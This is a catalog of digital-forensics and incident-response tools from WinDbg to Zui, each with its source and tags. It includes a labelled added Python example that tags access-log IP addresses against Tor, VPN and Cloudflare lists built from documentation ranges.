WinDbg Winget WinDbg is a powerful debugger from Microsoft that can be used for analyzing crash dumps, debugging applications, and performing memory forensics. It is commonly used in incident response and malware analysis to investigate system crashes and analyze the behavior of malicious software. debugging, memory-forensics, windows .dmp, .exe, .dll, .sys
Windows Terminal (Canary) HTTP Windows Terminal Canary package. terminal, shell
WinMerge Winget WinMerge is a visual file and directory comparison tool that helps you compare files and directories. It is useful for identifying differences between files, merging changes, and synchronizing directories. binary-diffing
WinObjEx64 GitHub Release WinObjEx64 is an advanced utility that lets you explore the Windows Object Manager namespace. windows, debugging
winpmem HTTP winpmem is a Windows memory acquisition driver. memory-forensics, acquisition .raw, .aff4
WireGuard Winget WireGuard is a modern and efficient VPN protocol that provides secure and fast connections. It is designed to be simple to configure and use, making it a popular choice for both personal and enterprise VPN solutions. network Full only
Wireshark Winget Wireshark is a widely used network protocol analyzer that allows you to capture and analyze network traffic. It can be used for troubleshooting network issues, analyzing security incidents, and learning about network protocols. Wireshark provides a graphical interface for viewing and filtering captured packets, making it easier to analyze complex network traffic. network-analysis, pcap, protocol-analysis .pcap, .pcapng, .cap
Wireshark Manuf Enrichment Wireshark OUI/MAC address manufacturer lookup file. network, network-analysis .txt
Witr GitHub Release Why is this running? forensics, triage
X4BNet Bots List Enrichment X4BNet list of known bot IP addresses. threat-intelligence, network, blocklist
X4BNet Cloudflare List Enrichment X4BNet list of known Cloudflare IP addresses. network, blocklist
X4BNet Route53 List Enrichment X4BNet list of known AWS Route53 health check IP addresses. dns, network, blocklist
X4BNet Search Engine List Enrichment X4BNet list of known search engine crawler IP addresses. search, network, blocklist
X4BNet StopForumSpam Enrichment X4BNet list of known spam IP addresses from StopForumSpam. email, network, blocklist
X4BNet TOR Exit List Enrichment X4BNet list of known TOR exit node IP addresses. network, blocklist
X4BNet UptimeRobot List Enrichment X4BNet list of known UptimeRobot monitoring IP addresses. monitoring, network, blocklist
X4BNet VPN List Enrichment X4BNet list of known VPN IP addresses. network, blocklist
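Added example, not part of dfirws or the X4BNet and Tor Project feeds: how the blocklist-style enrichment entries above are actually applied to log data, using only the standard library. Each list is loaded from the one-entry-per-line form such feeds use (single addresses or CIDR prefixes, `#` comments), collapsed into sorted non-overlapping networks per IP version so a lookup is one bisect and one membership test, and then used to tag the client address of sample access-log lines. The list excerpts and log lines are constructed from documentation ranges (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, 2001:db8::/32).

```python
"""Tag IPs in log lines against CIDR/IP blocklists."""
import bisect
import ipaddress
import re

# Constructed excerpts in the one-entry-per-line shape such feeds use.
TOR_EXIT_LIST = "# constructed sample\n198.51.100.7\n198.51.100.8\n2001:db8:dead::1\n"
VPN_LIST = "203.0.113.0/25\n203.0.113.64/26  # overlaps the /25 on purpose\n"
CLOUDFLARE_LIST = "192.0.2.0/24\n"


class Blocklist:
    """Sorted, non-overlapping networks per IP version; lookup is bisect + one membership test."""

    def __init__(self, name, text):
        self.name = name
        by_version = {4: [], 6: []}
        for line in text.splitlines():
            entry = line.split("#", 1)[0].strip()
            if entry:
                net = ipaddress.ip_network(entry, strict=False)
                by_version[net.version].append(net)
        self.tables = {}
        for version, nets in by_version.items():
            merged = sorted(ipaddress.collapse_addresses(nets))   # drops overlaps, merges neighbours
            self.tables[version] = ([int(n.network_address) for n in merged], merged)

    def __contains__(self, ip):
        starts, nets = self.tables[ip.version]
        i = bisect.bisect_right(starts, int(ip)) - 1   # last network starting at or before ip
        return i >= 0 and ip in nets[i]                # non-overlap means one check suffices

    def __len__(self):
        return sum(len(nets) for _, nets in self.tables.values())


LISTS = [Blocklist("tor-exit", TOR_EXIT_LIST), Blocklist("vpn", VPN_LIST),
         Blocklist("cloudflare", CLOUDFLARE_LIST)]
IP_RE = re.compile(r"^(\S+)")   # client address is the first field of a combined-format line


def tag_ip(text, lists=LISTS):
    """Names of every list containing the address; raises ValueError for non-addresses."""
    ip = ipaddress.ip_address(text)
    return [bl.name for bl in lists if ip in bl]


def enrich(lines, lists=LISTS):
    """(ip, tags, line) for each parseable log line; tags are context, not verdicts."""
    out = []
    for line in lines:
        m = IP_RE.match(line)
        if not m:
            continue
        try:
            tags = tag_ip(m.group(1), lists)
        except ValueError:
            continue
        out.append((m.group(1), tags, line))
    return out


# Constructed access-log lines.
SAMPLE_LOG = [
    '198.51.100.7 - - [05/Mar/2024:09:41:07 +0000] "POST /wp-login.php HTTP/1.1" 200 512',
    '203.0.113.77 - - [05/Mar/2024:09:41:09 +0000] "GET /admin HTTP/1.1" 302 0',
    '203.0.113.200 - - [05/Mar/2024:09:41:12 +0000] "GET / HTTP/1.1" 200 2048',
    '192.0.2.55 - - [05/Mar/2024:09:41:15 +0000] "GET /robots.txt HTTP/1.1" 200 64',
    '2001:db8:dead::1 - - [05/Mar/2024:09:41:20 +0000] "GET / HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, tags, line in enrich(SAMPLE_LOG):
        print(f"{ip:<18} {','.join(tags) or '-':<12} {line.split(chr(34))[1]}")
```

Read the tags for what each list means: a Tor or VPN hit says the source is anonymised, which is context for triage rather than evidence of attack, while the Cloudflare, Route53, UptimeRobot and search-engine lists mostly serve to recognise expected traffic and keep it out of alerting. Refresh the lists on a schedule; exit nodes and VPN ranges change daily.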
x64dbg GitHub Release An open-source user mode debugger for Windows. Optimized for reverse engineering and malware analysis. reverse-engineering, debugging, dynamic-analysis .exe, .dll
XELFViewer GitHub Release ELF file viewer/editor for Windows, Linux and MacOS. reverse-engineering, elf-analysis .elf, .mach-o
XLMMacroDeobfuscator Python office, vba, deobfuscation, malware-analysis .xls, .xlsm, .xlsb
xlrd Python office, data-extraction .xls
XlsxWriter Python office .xlsx
xxhash Python hashing
YAMAGoya GitHub Release Yet Another Memory Analyzer for malware detection and Guarding Operations with YARA and SIGMA yara, detection-rules .yar, .yara Full only
YARA GitHub Release YARA is a tool for identifying and classifying malware. yara, malware-analysis, detection, detection-rules .yar, .yara, .exe, .dll, .bin
YARA Forge Rules Core Enrichment YARA Forge core ruleset - curated set of high-quality YARA rules. yara, detection-rules, malware-detection .yar, .zip
YARA Forge Rules Extended Enrichment YARA Forge extended ruleset - broader set of YARA rules beyond the core set. yara, detection-rules, malware-detection .yar, .zip
YARA Forge Rules Full Enrichment YARA Forge full ruleset - comprehensive collection of all available YARA rules. yara, detection-rules, malware-detection .yar, .zip
yara-python Python yara, malware-analysis, detection .yar, .yara
yara-x GitHub Release yara-x is a faster and more flexible version of YARA. yara, malware-analysis, detection, detection-rules .yar, .yara, .exe, .dll, .bin
yq GitHub Release yq is a portable command-line YAML, JSON, XML, CSV, TOML and properties processor. yaml, data-processing, cli .yaml, .yml, .json, .xml, .toml
zaproxy GitHub Release The Zed Attack Proxy (ZAP) by Checkmarx is the world’s most widely used web app scanner. Free and open source. A community based GitHub Top 1000 project that anyone can contribute to. web, security-testing, network Full only
zensical Python Project documentation with Markdown. documentation, markdown .md, .toml
Zircolite GitHub Release Zircolite is a standalone Sigma-based detection tool for EVTX, Auditd, Sysmon for Linux, XML, JSONL and NDJSON logs. log-analysis, sigma, detection, incident-response .evtx, .json
zstd GitHub Release Zstandard is a fast lossless compression algorithm. compression, decompression, cli .zst
Zui GitHub Release Zui is a tool for analyzing network traffic. It can read pcap and zng files and provides a powerful query language for analyzing the data. network-analysis, pcap .pcap, .pcapng, .zng Full only